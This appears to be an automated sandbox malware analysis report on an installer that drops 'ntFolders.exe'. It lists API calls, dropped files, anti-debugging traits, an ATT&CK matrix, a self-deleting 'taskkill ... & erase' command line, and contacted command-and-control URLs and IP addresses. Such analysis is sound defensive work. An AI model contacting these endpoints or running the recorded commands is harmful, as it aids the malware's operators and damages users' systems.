                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004042AA push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408B24 push 00408B57h; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404327 push 00404435h; ret
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040438C push 00404435h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00409B70 push 00409BADh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040A257 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00478210 push 004782BBh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040A22B push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00412B40 push 00412BA3h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00450FF8 push 0045102Bh; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004055BD push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040568D push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040570E push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004057F0 push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040578B push 00405899h; ret
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004311AD push esi; ret
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F4BB push ecx; ret
                Source: ntFolders.exe.1.dr | Static PE information: section name: .aud104
                Source: initial sample | Static PE information: section name: .text entropy: 7.372860732455768
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Program Files (x86)\PrintFolders\is-K96P8.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_iscrypt.dll
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | File created: C:\Program Files (x86)\PrintFolders\ntFolders.exe
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004243AC IsIconic,SetActiveWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004177B0 IsIconic,GetCapture,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00417EE6 IsIconic,SetWindowPos,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy)
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-K96P8.tmp
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004095D0 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00451554 FindFirstFileA,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0048A778 FindFirstFileA,6D7069D0,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00423E2D FindFirstFileExW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_1000959D FindFirstFileExW,
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW:
                Source: ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp, ntFolders.exe, 00000002.00000002.394139951.000000000187A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
                Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F789 SetUnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "ntFolders.exe" /f
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_004593E4 GetVersion,GetModuleHandleA,6D705550,6D705550,6D705550,AllocateAndInitializeSid,LocalFree,
                Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: Program Manager
                Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: F.program managerv
                Source: ntFolders.exe, 00000002.00000002.394391678.000000000353F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: program manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA,
                Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: GetLocaleInfoA,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: GetLocaleInfoA,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: EnumSystemLocalesW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exe | Code function: 2_2_0040F7F3 cpuid
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00455B2C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D705CA0,SetNamedPipeHandleState,6DB77180,CloseHandle,CloseHandle,
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004026C4 GetSystemTime,
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00405CB0 GetVersionExA,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp | Code function: 1_2_00453A24 GetUserNameA,

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK matrix (the number in parentheses is the count of matched signatures for that technique; "-" marks an empty cell):

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation (1) | Path Interception | Access Token Manipulation (1) | Masquerading (2) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Command and Scripting Interpreter (2) | Boot or Logon Initialization Scripts | Process Injection (13) | Disable or Modify Tools (1) | LSASS Memory | Security Software Discovery (141) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Native API (2) | Logon Script (Windows) | Logon Script (Windows) | Access Token Manipulation (1) | Security Account Manager | Process Discovery (3) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (13) | NTDS | Application Window Discovery (11) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (11) | SIM Card Swap | - | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (23) | DCSync | File and Directory Discovery (3) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery (26) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
                Behavior Graph ID: 764043 | Sample: file.exe | Start date: 09/12/2022 | Architecture: WINDOWS | Score: 96
                • Sample-level DNS/IP: 45.139.105.1 (CMCSUS, Italy); 85.31.46.167 (CLOUDCOMPUTINGDE, Germany)
                • Sample-level signatures: Snort IDS alert for network traffic; Antivirus detection for URL or domain; Detected unpacking (changes PE section rights); 4 other signatures
                • file.exe started
                  • dropped: C:\Users\user\AppData\Local\...\is-I19BM.tmp (PE32)
                  • is-I19BM.tmp started
                    • dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Users\user\AppData\Local\...\_iscrypt.dll (PE32); C:\...\unins000.exe (copy) (PE32); 5 other files (4 malicious)
                    • ntFolders.exe started
                      • DNS/IP: 107.182.129.235, 49692, 80 (META-ASUS, Reserved); 171.22.30.106, 49693, 80 (CMCSUS, Germany); 45.139.105.171, 49691, 80 (CMCSUS, Italy)
                      • dropped: C:\Users\user\AppData\Roaming\...\karcA17.exe (PE32)
                      • karcA17.exe started; signature: Multi AV Scanner detection for dropped file
                      • cmd.exe started
                        • taskkill.exe started
                        • conhost.exe started

                No Antivirus matches
                Source | Detection | Scanner | Label
                C:\Program Files (x86)\PrintFolders\ntFolders.exe | 100% | Joe Sandbox ML | -
                C:\Program Files (x86)\PrintFolders\Russian.dll (copy) | 0% | ReversingLabs | -
                C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp | 0% | ReversingLabs | -
                C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_iscrypt.dll | 2% | ReversingLabs | -
                C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | -
                C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll | 2% | ReversingLabs | -
                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe | 50% | ReversingLabs | Win32.Trojan.Generic
                Source | Detection | Scanner | Label
                2.2.ntFolders.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1250671
                0.0.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                0.3.file.exe.2118000.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
                0.2.file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                2.2.ntFolders.exe.10000000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
                1.2.is-I19BM.tmp.400000.0.unpack | 100% | Avira | HEUR/AGEN.1232832
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://www.innosetup.com/ | 0% | URL Reputation | safe
                http://www.remobjects.com/?ps | 0% | URL Reputation | safe
                http://www.remobjects.com/?ps | 0% | URL Reputation | safe
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte | 0% | URL Reputation | safe
                http://www.innosetup.com | 0% | URL Reputation | safe
                http://107.182.129.235/storage/ping.php | 0% | URL Reputation | safe
                http://171.22.30.106/library.php | 100% | URL Reputation | malware
                http://107.182.129.235/storage/extension.php | 0% | URL Reputation | safe
                http://www.remobjects.com/?psU | 0% | URL Reputation | safe
                http://www.innosetup.comDVarFileInfo$ | 0% | Avira URL Cloud | safe
                http://171.22.30.106/library.phpH | 100% | Avira URL Cloud | malware
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte | true | URL Reputation: safe | unknown
                http://107.182.129.235/storage/ping.php | true | URL Reputation: safe | unknown
                http://171.22.30.106/library.php | true | URL Reputation: malware | unknown
                http://107.182.129.235/storage/extension.php | true | URL Reputation: safe | unknown

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://www.innosetup.com/ | is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.dr | false | URL Reputation: safe | unknown
                http://171.22.30.106/library.phpH | ntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
